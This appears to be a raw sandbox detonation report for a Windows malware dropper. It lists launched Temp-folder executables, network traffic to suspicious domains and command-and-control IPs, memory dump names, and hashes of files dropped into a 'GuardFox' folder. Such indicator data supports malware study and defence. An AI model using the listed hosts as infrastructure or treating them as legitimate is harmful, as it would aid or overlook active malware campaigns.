
powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\7B06.exe

C:\Users\Admin\AppData\Local\Temp\7B06.exe

C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe

"C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe"

C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe

"C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe"

C:\Users\Admin\AppData\Local\Temp\FourthX.exe

"C:\Users\Admin\AppData\Local\Temp\FourthX.exe"

C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe

C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe

C:\Users\Admin\AppData\Local\Temp\heidiZzOs_nAUVEVs\tgDCkeEhpafr5oQRSOwS.exe

"C:\Users\Admin\AppData\Local\Temp\heidiZzOs_nAUVEVs\tgDCkeEhpafr5oQRSOwS.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 82.177.190.20.in-addr.arpa udp
US 8.8.8.8:53 181.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 20.231.121.79:80 tcp
NL 195.20.16.45:80 195.20.16.45 tcp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 api.myip.com udp
US 172.67.75.163:443 api.myip.com tcp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.186.192:443 ipinfo.io tcp
US 8.8.8.8:53 45.16.20.195.in-addr.arpa udp
US 8.8.8.8:53 163.75.67.172.in-addr.arpa udp
US 8.8.8.8:53 192.186.117.34.in-addr.arpa udp
US 8.8.8.8:53 def.bestsup.su udp
RU 147.45.47.101:80 147.45.47.101 tcp
US 8.8.8.8:53 294down-river.sbs udp
DE 185.172.128.127:80 185.172.128.127 tcp
US 8.8.8.8:53 vk.com udp
US 8.8.8.8:53 acenitive.shop udp
US 8.8.8.8:53 triedchicken.net udp
US 8.8.8.8:53 monoblocked.com udp
US 8.8.8.8:53 cleued.com udp
US 8.8.8.8:53 medfioytrkdkcodlskeej.net udp
US 104.21.29.103:80 def.bestsup.su tcp
RU 87.240.132.72:80 vk.com tcp
RU 87.240.132.72:80 vk.com tcp
US 104.21.91.214:80 triedchicken.net tcp
US 104.21.67.206:80 294down-river.sbs tcp
US 8.8.8.8:53 cczhk.com udp
US 188.114.96.2:80 acenitive.shop tcp
US 172.67.154.10:80 cleued.com tcp
US 188.114.96.2:80 acenitive.shop tcp
RU 91.215.85.209:80 medfioytrkdkcodlskeej.net tcp
US 104.21.91.214:80 triedchicken.net tcp
US 188.114.96.2:80 acenitive.shop tcp
US 188.114.96.2:80 acenitive.shop tcp
US 172.67.154.10:80 cleued.com tcp
RU 45.130.41.108:80 monoblocked.com tcp
US 104.21.91.214:80 triedchicken.net tcp
US 188.114.96.2:80 acenitive.shop tcp
US 188.114.96.2:80 acenitive.shop tcp
US 172.67.154.10:80 cleued.com tcp
RU 87.240.132.72:80 vk.com tcp
US 104.21.91.214:443 triedchicken.net tcp
RU 87.240.132.72:80 vk.com tcp
US 188.114.96.2:443 acenitive.shop tcp
US 188.114.96.2:443 acenitive.shop tcp
US 172.67.154.10:443 cleued.com tcp
RU 91.215.85.209:80 medfioytrkdkcodlskeej.net tcp
US 104.21.67.206:443 294down-river.sbs tcp
RU 45.130.41.108:80 monoblocked.com tcp
RU 87.240.132.72:80 vk.com tcp
RU 87.240.132.72:80 vk.com tcp
RU 91.215.85.209:80 medfioytrkdkcodlskeej.net tcp
RU 91.215.85.209:443 medfioytrkdkcodlskeej.net tcp
RU 87.240.132.72:80 vk.com tcp
RU 87.240.132.72:80 vk.com tcp
MX 187.156.75.116:80 cczhk.com tcp
US 8.8.8.8:53 x2.c.lencr.org udp
GB 2.19.169.32:80 x2.c.lencr.org tcp
RU 87.240.132.72:80 vk.com tcp
RU 87.240.132.72:80 vk.com tcp
RU 87.240.132.72:80 vk.com tcp
RU 87.240.132.72:80 vk.com tcp
US 8.8.8.8:53 pergor.com udp
US 8.8.8.8:53 carthewasher.net udp
US 172.67.161.113:443 carthewasher.net tcp
MX 187.156.75.116:80 cczhk.com tcp
US 8.8.8.8:53 127.128.172.185.in-addr.arpa udp
US 8.8.8.8:53 103.29.21.104.in-addr.arpa udp
US 8.8.8.8:53 101.47.45.147.in-addr.arpa udp
US 8.8.8.8:53 214.91.21.104.in-addr.arpa udp
US 8.8.8.8:53 206.67.21.104.in-addr.arpa udp
US 8.8.8.8:53 2.96.114.188.in-addr.arpa udp
US 8.8.8.8:53 10.154.67.172.in-addr.arpa udp
US 8.8.8.8:53 72.132.240.87.in-addr.arpa udp
US 8.8.8.8:53 209.85.215.91.in-addr.arpa udp
US 8.8.8.8:53 108.41.130.45.in-addr.arpa udp
US 8.8.8.8:53 227.16.217.172.in-addr.arpa udp
US 8.8.8.8:53 32.169.19.2.in-addr.arpa udp
US 8.8.8.8:53 116.75.156.187.in-addr.arpa udp
US 8.8.8.8:53 113.161.67.172.in-addr.arpa udp
RU 45.130.41.108:80 monoblocked.com tcp
RU 45.130.41.108:443 monoblocked.com tcp
RU 87.240.132.72:80 vk.com tcp
RU 87.240.132.72:80 vk.com tcp
US 172.67.156.81:443 pergor.com tcp
RU 87.240.132.72:80 vk.com tcp
US 8.8.8.8:53 632432.site udp
NL 194.104.136.64:443 632432.site tcp
RU 87.240.132.72:80 vk.com tcp
RU 87.240.132.72:80 vk.com tcp
RU 87.240.132.72:80 vk.com tcp
US 8.8.8.8:53 81.156.67.172.in-addr.arpa udp
US 8.8.8.8:53 193.179.17.96.in-addr.arpa udp
RU 87.240.132.72:80 vk.com tcp
RU 87.240.132.72:80 vk.com tcp
RU 87.240.132.72:80 vk.com tcp
RU 87.240.132.72:80 vk.com tcp
RU 87.240.132.72:80 vk.com tcp
RU 87.240.132.72:80 vk.com tcp
RU 87.240.132.72:80 vk.com tcp
RU 87.240.132.72:80 vk.com tcp
RU 87.240.132.72:80 vk.com tcp
RU 87.240.132.72:80 vk.com tcp
RU 87.240.132.72:80 vk.com tcp
RU 87.240.132.72:80 vk.com tcp
RU 87.240.132.72:443 vk.com tcp
RU 87.240.132.72:443 vk.com tcp
US 8.8.8.8:53 226.20.18.104.in-addr.arpa udp
RU 87.240.132.72:443 vk.com tcp
US 8.8.8.8:53 psv4.userapi.com udp
RU 87.240.190.89:443 psv4.userapi.com tcp
RU 87.240.132.72:443 vk.com tcp
US 8.8.8.8:53 64.136.104.194.in-addr.arpa udp
US 8.8.8.8:53 89.190.240.87.in-addr.arpa udp
RU 87.240.132.72:443 vk.com tcp
US 8.8.8.8:53 sun6-20.userapi.com udp
NL 95.142.206.0:443 sun6-20.userapi.com tcp
RU 87.240.132.72:443 vk.com tcp
RU 87.240.132.72:443 vk.com tcp
US 8.8.8.8:53 sun6-22.userapi.com udp
NL 95.142.206.2:443 sun6-22.userapi.com tcp
RU 87.240.132.72:443 vk.com tcp
US 8.8.8.8:53 sun6-21.userapi.com udp
NL 95.142.206.1:443 sun6-21.userapi.com tcp
NL 95.142.206.1:443 sun6-21.userapi.com tcp
RU 87.240.132.72:443 vk.com tcp
RU 87.240.132.72:443 vk.com tcp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 0.206.142.95.in-addr.arpa udp
US 8.8.8.8:53 2.206.142.95.in-addr.arpa udp
US 8.8.8.8:53 1.206.142.95.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 18.134.221.88.in-addr.arpa udp
NL 195.20.16.45:80 195.20.16.45 tcp
US 8.8.8.8:53 iplis.ru udp
US 104.21.63.150:443 iplis.ru tcp
US 8.8.8.8:53 iplogger.org udp
US 104.21.4.208:443 iplogger.org tcp
DE 185.172.128.24:80 185.172.128.24 tcp
US 8.8.8.8:53 150.63.21.104.in-addr.arpa udp
US 8.8.8.8:53 208.4.21.104.in-addr.arpa udp
US 8.8.8.8:53 24.128.172.185.in-addr.arpa udp
US 8.8.8.8:53 api.2ip.ua udp
US 104.21.65.24:443 api.2ip.ua tcp
US 8.8.8.8:53 24.65.21.104.in-addr.arpa udp
RU 193.233.132.67:50505 tcp
DE 77.105.147.130:80 77.105.147.130 tcp
US 172.67.75.163:443 api.myip.com tcp
US 8.8.8.8:53 villagemagneticcsa.fun udp
US 8.8.8.8:53 chocolatedepressofw.fun udp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.186.192:443 ipinfo.io tcp
US 8.8.8.8:53 lighterepisodeheighte.fun udp
US 8.8.8.8:53 67.132.233.193.in-addr.arpa udp
US 8.8.8.8:53 130.147.105.77.in-addr.arpa udp
US 8.8.8.8:53 problemregardybuiwo.fun udp
US 8.8.8.8:53 prescriptionstorageag.fun udp
US 8.8.8.8:53 edurestunningcrackyow.fun udp
US 8.8.8.8:53 pooreveningfuseor.pw udp
US 8.8.8.8:53 turkeyunlikelyofw.shop udp
US 8.8.8.8:53 healthproline.pro udp
US 104.21.76.253:443 turkeyunlikelyofw.shop tcp
US 172.67.215.138:443 healthproline.pro tcp
US 8.8.8.8:53 associationokeo.shop udp
US 8.8.8.8:53 theoryapparatusjuko.fun udp
US 172.67.147.18:443 associationokeo.shop tcp
DE 77.105.147.130:80 77.105.147.130 tcp
US 8.8.8.8:53 253.76.21.104.in-addr.arpa udp
US 8.8.8.8:53 138.215.67.172.in-addr.arpa udp
US 8.8.8.8:53 178.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 snuggleapplicationswo.fun udp
US 8.8.8.8:53 smallrabbitcrossing.site udp
US 8.8.8.8:53 18.147.67.172.in-addr.arpa udp
US 8.8.8.8:53 punchtelephoneverdi.store udp
US 8.8.8.8:53 telephoneverdictyow.site udp
US 8.8.8.8:53 strainriskpropos.store udp
NL 195.20.16.46:80 195.20.16.46 tcp
US 8.8.8.8:53 46.16.20.195.in-addr.arpa udp
NL 195.20.16.46:80 195.20.16.46 tcp
DE 77.105.147.130:80 77.105.147.130 tcp
US 8.8.8.8:53 176.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 t.me udp
RU 5.42.65.31:48396 tcp
NL 149.154.167.99:443 t.me tcp
US 8.8.8.8:53 99.167.154.149.in-addr.arpa udp
US 8.8.8.8:53 31.65.42.5.in-addr.arpa udp
US 8.8.8.8:53 24.249.124.192.in-addr.arpa udp
US 104.21.63.150:443 iplis.ru tcp
US 104.21.4.208:443 iplogger.org tcp
DE 142.132.224.223:9001 tcp
US 8.8.8.8:53 234.212.58.216.in-addr.arpa udp
US 8.8.8.8:53 67.204.58.216.in-addr.arpa udp
US 8.8.8.8:53 223.224.132.142.in-addr.arpa udp
DE 142.132.224.223:9001 tcp
DE 142.132.224.223:9001 tcp
RU 193.233.132.67:50500 tcp
RU 193.233.132.62:50500 tcp
DE 142.132.224.223:9001 tcp
CA 37.120.237.196:50500 tcp
US 34.117.186.192:443 ipinfo.io tcp
US 8.8.8.8:53 196.237.120.37.in-addr.arpa udp
US 8.8.8.8:53 177.178.17.96.in-addr.arpa udp
US 34.117.186.192:443 ipinfo.io tcp
US 8.8.8.8:53 db-ip.com udp
US 104.26.4.15:443 db-ip.com tcp
US 8.8.8.8:53 62.132.233.193.in-addr.arpa udp
US 8.8.8.8:53 15.4.26.104.in-addr.arpa udp
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp
US 34.117.186.192:443 ipinfo.io tcp
US 104.26.4.15:443 db-ip.com tcp
RU 185.215.113.46:80 185.215.113.46 tcp
RU 193.233.132.49:53 46.113.215.185.in-addr.arpa udp
RU 193.233.132.49:53 49.132.233.193.in-addr.arpa udp
RU 193.233.132.49:53 selebration17io.io udp
RU 91.215.85.120:80 selebration17io.io tcp
NL 195.20.16.46:80 195.20.16.46 tcp
US 8.8.8.8:53 49.132.233.193.in-addr.arpa udp
RU 193.233.132.49:53 120.85.215.91.in-addr.arpa udp
US 8.8.8.8:53 www.youtube.com udp
US 8.8.8.8:53 accounts.google.com udp
GB 172.217.169.14:443 www.youtube.com tcp
NL 173.194.79.84:443 accounts.google.com tcp
CA 198.100.149.77:443 tcp
US 8.8.8.8:53 www.linkedin.com udp
US 13.107.42.14:443 www.linkedin.com tcp
US 108.39.229.147:443 tcp
US 8.8.8.8:53 www.facebook.com udp
US 8.8.8.8:53 14.169.217.172.in-addr.arpa udp
US 8.8.8.8:53 84.79.194.173.in-addr.arpa udp
US 8.8.8.8:53 14.42.107.13.in-addr.arpa udp
GB 157.240.221.35:443 www.facebook.com tcp
GB 172.217.169.14:443 www.youtube.com udp
NL 173.194.79.84:443 accounts.google.com udp
US 8.8.8.8:53 35.221.240.157.in-addr.arpa udp
US 8.8.8.8:53 i.ytimg.com udp
GB 142.250.180.22:443 i.ytimg.com tcp
GB 142.250.180.22:443 i.ytimg.com udp
DE 185.220.101.198:10198 tcp
US 8.8.8.8:53 static.xx.fbcdn.net udp
US 8.8.8.8:53 22.180.250.142.in-addr.arpa udp
GB 163.70.147.23:443 static.xx.fbcdn.net tcp
GB 163.70.147.23:443 static.xx.fbcdn.net tcp
US 8.8.8.8:53 23.147.70.163.in-addr.arpa udp
US 8.8.8.8:53 www.youtube.com udp
US 8.8.8.8:53 contile.services.mozilla.com udp
GB 157.240.221.35:443 www.facebook.com tcp
US 8.8.8.8:53 content-signature-2.cdn.mozilla.net udp
US 8.8.8.8:53 contile.services.mozilla.com udp
US 34.117.237.239:443 contile.services.mozilla.com tcp
GB 172.217.169.14:443 www.youtube.com tcp
US 8.8.8.8:53 youtube-ui.l.google.com udp
US 8.8.8.8:53 youtube-ui.l.google.com udp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 contile.services.mozilla.com udp
US 34.160.144.191:443 prod.content-signature-chains.prod.webservices.mozgcp.net tcp
US 8.8.8.8:53 shavar.services.mozilla.com udp
FR 37.187.23.232:80 tcp
US 8.8.8.8:53 shavar.prod.mozaws.net udp
GB 172.217.169.14:443 youtube-ui.l.google.com udp
US 52.24.144.241:443 shavar.prod.mozaws.net tcp
GB 172.217.169.14:443 youtube-ui.l.google.com tcp
US 8.8.8.8:53 shavar.prod.mozaws.net udp
US 8.8.8.8:53 push.services.mozilla.com udp
US 8.8.8.8:53 autopush.prod.mozaws.net udp
GB 157.240.221.35:443 www.facebook.com udp
NL 173.194.79.84:443 accounts.google.com tcp
US 8.8.8.8:53 74.204.58.216.in-addr.arpa udp
US 8.8.8.8:53 232.23.187.37.in-addr.arpa udp
US 8.8.8.8:53 autopush.prod.mozaws.net udp
US 8.8.8.8:53 firefox.settings.services.mozilla.com udp
GB 163.70.147.23:443 static.xx.fbcdn.net tcp
GB 163.70.147.23:443 static.xx.fbcdn.net tcp
GB 163.70.147.23:443 static.xx.fbcdn.net tcp
US 34.149.100.209:443 firefox.settings.services.mozilla.com tcp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 34.107.243.93:443 autopush.prod.mozaws.net tcp
US 8.8.8.8:53 241.144.24.52.in-addr.arpa udp
NL 173.194.79.84:443 accounts.google.com udp
US 34.149.100.209:443 prod.remote-settings.prod.webservices.mozgcp.net tcp
GB 142.250.180.22:443 i.ytimg.com tcp
US 8.8.8.8:53 i.ytimg.com udp
US 135.148.100.90:443 tcp
SE 81.230.245.67:444 tcp
RU 193.233.132.62:50500 tcp
GB 142.250.180.22:443 i.ytimg.com udp
US 8.8.8.8:53 www.facebook.com udp
US 8.8.8.8:53 accounts.google.com udp
FR 157.240.196.35:443 www.facebook.com tcp
US 8.8.8.8:53 star-mini.c10r.facebook.com udp
NL 173.194.79.84:443 accounts.google.com tcp
GB 172.217.169.14:443 youtube-ui.l.google.com udp
NL 173.194.79.84:443 accounts.google.com udp
US 8.8.8.8:53 star-mini.c10r.facebook.com udp
US 8.8.8.8:53 accounts.google.com udp
GB 142.250.180.22:443 i.ytimg.com tcp
GB 142.250.180.22:443 i.ytimg.com tcp
FR 157.240.196.35:443 www.facebook.com udp
US 8.8.8.8:53 67.245.230.81.in-addr.arpa udp
US 8.8.8.8:53 234.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 35.196.240.157.in-addr.arpa udp
US 8.8.8.8:53 3.213.58.216.in-addr.arpa udp
US 8.8.8.8:53 content-autofill.googleapis.com udp
US 8.8.8.8:53 227.179.250.142.in-addr.arpa udp
GB 163.70.147.23:443 static.xx.fbcdn.net udp
RU 193.233.132.67:50500 tcp
RU 193.233.132.62:50500 tcp
US 8.8.8.8:53 accounts.youtube.com udp
GB 172.217.16.238:443 accounts.youtube.com tcp
US 8.8.8.8:53 www3.l.google.com udp
US 8.8.8.8:53 www3.l.google.com udp
GB 172.217.16.238:443 www3.l.google.com udp
US 8.8.8.8:53 238.16.217.172.in-addr.arpa udp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 ipinfo.io udp
GB 172.217.16.228:443 www.google.com tcp
GB 172.217.16.228:443 www.google.com udp
US 8.8.8.8:53 www.google.com udp
US 34.117.186.192:443 ipinfo.io tcp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 accounts.youtube.com udp
GB 172.217.16.238:443 accounts.youtube.com tcp
US 8.8.8.8:53 228.16.217.172.in-addr.arpa udp
US 34.117.186.192:443 ipinfo.io tcp
US 8.8.8.8:53 db-ip.com udp
US 104.26.5.15:443 db-ip.com tcp
NL 173.194.79.84:443 accounts.google.com tcp
NL 173.194.79.84:443 accounts.google.com udp
GB 172.217.16.228:443 www.google.com tcp
US 8.8.8.8:53 15.5.26.104.in-addr.arpa udp
GB 172.217.16.228:443 www.google.com udp
US 8.8.8.8:53 resergvearyinitiani.shop udp
US 188.114.96.2:443 resergvearyinitiani.shop tcp
US 8.8.8.8:53 play.google.com udp
GB 142.250.200.14:443 play.google.com tcp
US 8.8.8.8:53 play.google.com udp
DE 185.172.128.19:80 185.172.128.19 tcp
US 8.8.8.8:53 play.google.com udp
GB 142.250.200.14:443 play.google.com tcp
US 8.8.8.8:53 static.xx.fbcdn.net udp
GB 142.250.200.14:443 play.google.com udp
US 8.8.8.8:53 14.200.250.142.in-addr.arpa udp
GB 163.70.147.23:443 static.xx.fbcdn.net tcp
US 8.8.8.8:53 scontent.xx.fbcdn.net udp
GB 163.70.147.23:443 scontent.xx.fbcdn.net tcp
GB 163.70.147.23:443 scontent.xx.fbcdn.net tcp
GB 163.70.147.23:443 scontent.xx.fbcdn.net tcp
GB 163.70.147.23:443 scontent.xx.fbcdn.net tcp
GB 163.70.147.23:443 scontent.xx.fbcdn.net tcp
GB 163.70.147.23:443 scontent.xx.fbcdn.net udp
US 8.8.8.8:53 scontent.xx.fbcdn.net udp
US 8.8.8.8:53 technologyenterdo.shop udp
US 172.67.180.132:443 technologyenterdo.shop tcp
US 34.117.186.192:443 ipinfo.io tcp
US 8.8.8.8:53 19.128.172.185.in-addr.arpa udp
US 8.8.8.8:53 132.180.67.172.in-addr.arpa udp
RU 193.233.132.49:53 19.128.172.185.in-addr.arpa udp
US 8.8.8.8:53 lighterepisodeheighte.fun udp
US 104.26.5.15:443 db-ip.com tcp
US 8.8.8.8:53 problemregardybuiwo.fun udp
CA 37.120.237.196:50500 tcp
US 8.8.8.8:53 detectordiscusser.shop udp
US 172.67.195.126:443 detectordiscusser.shop tcp
US 8.8.8.8:53 126.195.67.172.in-addr.arpa udp
US 8.8.8.8:53 edurestunningcrackyow.fun udp
US 8.8.8.8:53 pooreveningfuseor.pw udp
US 8.8.8.8:53 turkeyunlikelyofw.shop udp
US 188.114.97.2:443 turkeyunlikelyofw.shop tcp
US 8.8.8.8:53 2.97.114.188.in-addr.arpa udp
US 8.8.8.8:53 associationokeo.shop udp
US 104.21.10.242:443 associationokeo.shop tcp
US 8.8.8.8:53 242.10.21.104.in-addr.arpa udp
US 8.8.8.8:53 scontent-lhr6-1.xx.fbcdn.net udp
NL 195.20.16.46:80 195.20.16.46 tcp
US 8.8.8.8:53 trmpc.com udp
UZ 195.158.3.162:80 trmpc.com tcp
US 8.8.8.8:53 162.3.158.195.in-addr.arpa udp
DE 185.172.128.90:80 185.172.128.90 tcp
US 8.8.8.8:53 90.128.172.185.in-addr.arpa udp
RU 193.233.132.49:53 90.128.172.185.in-addr.arpa udp

Files

memory/2136-0-0x0000000140000000-0x0000000140B9C000-memory.dmp

memory/2136-1-0x0000000140000000-0x0000000140B9C000-memory.dmp

memory/2136-2-0x00007FFC8F910000-0x00007FFC8FBD9000-memory.dmp

memory/2136-4-0x00007FFC8F910000-0x00007FFC8FBD9000-memory.dmp

memory/2136-3-0x00007FFC8F910000-0x00007FFC8FBD9000-memory.dmp

memory/2136-5-0x00007FFC80030000-0x00007FFC80031000-memory.dmp

memory/2136-6-0x00007FFC90830000-0x00007FFC908EE000-memory.dmp

memory/2136-7-0x00007FFC80000000-0x00007FFC80002000-memory.dmp

memory/2136-8-0x0000000140000000-0x0000000140B9C000-memory.dmp

memory/2136-9-0x0000000140000000-0x0000000140B9C000-memory.dmp

memory/2136-10-0x0000000140000000-0x0000000140B9C000-memory.dmp

memory/2136-11-0x0000000140000000-0x0000000140B9C000-memory.dmp

memory/2136-12-0x0000000140000000-0x0000000140B9C000-memory.dmp

C:\Windows\System32\GroupPolicy\gpt.ini

MD5 8ef9853d1881c5fe4d681bfb31282a01
SHA1 a05609065520e4b4e553784c566430ad9736f19f
SHA256 9228f13d82c3dc96b957769f6081e5bac53cffca4ffde0ba1e102d9968f184a2
SHA512 5ddee931a08cfea5bb9d1c36355d47155a24d617c2a11d08364ffc54e593064011dee4fea8ac5b67029cab515d3071f0ba0422bb76af492a3115272ba8feb005

memory/2136-13-0x0000000140000000-0x0000000140B9C000-memory.dmp

memory/2136-21-0x0000000140000000-0x0000000140B9C000-memory.dmp

memory/2136-22-0x00007FFC91C50000-0x00007FFC91E45000-memory.dmp

C:\Users\Admin\Documents\GuardFox\pPrCgUdP2JClGnpyLmHJPscG.exe

MD5 852f8672ad668dbef934f55b4d098973
SHA1 75713a5a598e5eccb863f6670ff4e5738058a64e
SHA256 5bd8c1d6809b1605876dc47c8a04312ebbbb7fc5d443ea81b1e3665c2fc34428
SHA512 5dadb891221cf37f451e563e775f793146c549390f1cd8524462f000b4ccc7337451997f00f089082674744ba9cd9a387615394f7428f48b69c429587ede0426

C:\Users\Admin\Documents\GuardFox\eQYk_b6jz16mJKmMtyzJXk5e.exe

MD5 d4dd3514cd270a040af7c1ef059606ff
SHA1 8c54f1de630043d22490853d93d0d237aae51db7
SHA256 a7cbec7bca69337408e138812f335d87e1b4ff900e31a05bb42619c6372e058a
SHA512 6335dec8466a4ac443f0c52cb8534e8282344280af488488b282672bd304657629138cd952201b7533b1876399fc3b61d6fd2732399d8ff246cea3018d6bb8c6

C:\Users\Admin\Documents\GuardFox\tICD3_G5dCLsOTlSefOYkF5v.exe

MD5 3f3a4b743aed6db292b3eb9601c93d94
SHA1 4cc5b29cc65cb7fa17bec2fd3073d943f76a5492
SHA256 13b2db71adabd1f7ca1ec14d4a623b1cdf5250b1f6e725ad26a393b60dbe907b
SHA512 f1dea75532c9d38cf4b05f2c90b77c7ac4a57bbdd979306b82eea82ab35154a6a6a7ffbd9e1b0e45b68c3f7a946fb3c43c5f0023859a484890529cdeb7451c00

C:\Users\Admin\Documents\GuardFox\Mi6AWN9vXRBRMcYeS_3_zVDQ.exe

MD5 43abfd80cbfe8afaa65961856640efc4
SHA1 71614b90bb167b289d6d01d3768727eb6ac61ec5
SHA256 f125414e6c33771e07ed5b186e765c5c7cbab090deee72d70af657f1b4abf691
SHA512 bf84a17d811fcd20602a49121731399517e327cf5b1af015d1967af7d741c1b1b03219da0d62b1d9f8abdd800ef7edca83acb7ca909deffdc5023853ea8b540e

C:\Users\Admin\Documents\GuardFox\TKKw1hmTwVBMTsgOoU3BCklJ.exe

MD5 af3cf8176e32d7370b12331171306fc2
SHA1 c71996150ba87ffb274936366e557b77bb7baba0
SHA256 aaa196b4e73bd2601bc2db3d5d04f24bad3f037e0237565ea3e6222c84c441b3
SHA512 232b38bbd08f6e89f3cf3be90f85e9f4bf63735b744e2988f9e54ef9ae6d926482e1153f13aa603a6be7197a4548ec0ed2fb3dc99b8872410b7d79a5bba954ff

C:\Users\Admin\Documents\GuardFox\QoPxz2PXYbxFkd1ZtaGIY5nB.exe

MD5 5b9b1de05903cf2187c6f97810d0279e
SHA1 798e1af4147a9aeac88348baef1db6091f9b72f6
SHA256 0496f898a723997a061b9779a07c4900dfb85e697fb8c524214f87620edf9823
SHA512 03345dc02790b8b2f7d97fda93b2e35aba2ddb184267a1bc1e6b721088caa5954b5d7a5674d4f02f3fcb107a3dff5a0eb04219f14e4733cf97fb69813b2f814d

C:\Users\Admin\Documents\GuardFox\ahAzs7ebC94TtCXZ451KXqOC.exe

MD5 a2cd0ee55ac61c65ad6d4be2ef602c18
SHA1 d96591ad585284c13d277d578851ab6293d44310
SHA256 b68e8b42419bc60ff72822495bf99175506668091a58fbd1d11747e039192be7
SHA512 bfee5ab8e75ad1edd98a13bf456da9ccead22c40a518ceacf90f259026cdfc938b7da6003bc4fb79e22720b46d74b308b76fda65f638217af4148984f2aa97ec

C:\Users\Admin\Documents\GuardFox\fVLq49qtba3ytPK4Nw9io13j.exe

MD5 e654823683cb9be41044f5a800be69fd
SHA1 d43214c03a47f3b0c77a82eca775d702eaa025e8
SHA256 68abca4995919db0fe3a4e9158062759b2267ebcd8e3036f7eb8e71ed6202c85
SHA512 d20b18482b8f85bfa887495275712527939b388f912eac2388b2c446d4370a87118c01482898316b943667b2525b9b089d44e8e693cc6c5a6d9355ab2d9e6bcc

C:\Users\Admin\Documents\GuardFox\97ctR1cufJfKYreB2JRoqsia.exe

MD5 631393c67cb220cf18796dec2314c118
SHA1 751638c8a1b070b354231a2fd4283f02f303ca94
SHA256 e98c24e3639daa42b133774bce94eb385d68b2a81be6fe460c997c5be900a600
SHA512 b41105af3663da05fd2382735aede37da71a5d85ba1051a7fba03f6beeb556d842015e9977171de3285d7bbe47a41200db8de9748c3b4629d342d013593c07d6

C:\Users\Admin\Documents\GuardFox\qdUD6vBsa4fF5MCF7Bn6PjqC.exe

MD5 9596858a78a4aaedaf4deb584b041a93
SHA1 6debe91bd16e527e7cda7833f2548a4e3ec014b7
SHA256 4a38c79d796ad7ac91e0e9159fd7b32a5946cbfb32d06891d4195b428bb1620b
SHA512 7b87586ab753467bcd715cdf30fe1cee0ef53036c35ba918e795b56c97ad9b51ddac905e7629cba08e2441c6f067970eead3d42f95a607bcad35aa0a93d71a44

C:\Users\Admin\Documents\GuardFox\Z78EaC7A1maUh2noqDPHqxE4.exe

MD5 10a75c1a4d265c762a6e9a63b406fa9c
SHA1 b4898ade35c9afa5ae04c7653fe790d1761349fa
SHA256 1dfa064545fa4eb9168660adb49a640cfb4c79c647adabc4d5a58daa96684946
SHA512 3ba2896a739036d86ac6651b713e2205b996554f24eda6b90a25965adea4f62b710d965ad4fb72b2352df93a2fa98affd6501b35b6604f390390c96af4e278d3

C:\Users\Admin\Documents\GuardFox\Odt0imGpkgnE0De9TQmDwGiD.exe

MD5 8d63cffe06f138cd0f161025e8aa5dcc
SHA1 a616295743cb9f16eaddda57ecaaaec1c41d7baa
SHA256 04a4efc3610be9f32cebdf236fe89ec02944cc28e56a83455d90fc9ef0337cea
SHA512 c8ba2946816b10dd4ba8a1a2eed35c111bd95c3fac6d277b580a1d50038f4c7447f0c3bb0d0eddde67e182cc2ba90b047cd2ba07a89b0ac3488718fbb8155523

C:\Users\Admin\Documents\GuardFox\RDN8aZtoyFxR0Sp8P1YPHjjm.exe

MD5 3b770d98fb0fa9a539471b1452feac0a
SHA1 15c980534a54ce404ad256cf30f534bc58775b69
SHA256 0c6390cf9f0519731b9a39ab40e8ac7c495d7737c3d6648c617f402473a179eb
SHA512 28d930477503145586bae522ea41f6c6b17d75778cc455f94120e7769d5dd5229dec8a005daa5e21ca9441c82615c144419b4c9624a1c0b26b8bc002ca8039a5

C:\Users\Admin\Documents\GuardFox\fpvCTUbLstZ4r68szSFC59Mu.exe

MD5 031473e31a490fd735305083cbdf81c8
SHA1 4382984616826d999456d79c30152fcfba8b0abc
SHA256 b9a1cbbc5af9327c6852ba98985c3282652160f040f33392d856a4173365a631
SHA512 5804d2b90eda3e9efb9f5d394eb2277bedaf14fefc447174330b71eb3bd126d25a26b431b0c7cf994af6e92af73e047c98ebc1a02814bef907e7ef7a2d9da6e8

C:\Users\Admin\Documents\GuardFox\gA119GY6BxzJ20qiar2SBob6.exe

MD5 2117899a2ae435139133075f560e2ae2
SHA1 17e212a4d9e9029cd65493ce4512df152f0f52da
SHA256 6c06f528548ea45c6080a37373ce9051592998b0943ddea3e41f020be225d6af
SHA512 7252bbad94df230a8a761a93d16cfadbe5ffe5c15b6bf0abefe86161b11458f729aa01eb94fec6ee6f28ea2e3032f573286ead7748e4f4640c9dd1938c158ff5

C:\Users\Admin\Documents\GuardFox\RZwYj5i1qII7mxAb7SqPKWq_.exe

MD5 5865dc9aee095d83cd9e895512ff5cbd
SHA1 63971c17b52bdc948eb5c5f71ad5d55af105660b
SHA256 9af8347f68f0745b6cd5b223cb4ccbd6924fc02da744928d54eb079efaa0aae3
SHA512 fa95461f58520ca43a1a0e19e1bb133258e2b36bb4d3beede2350f0ffa671c543869a9dbf316a9f5249452047419b1a2e74fbb401c3602545272f87096aeb75d

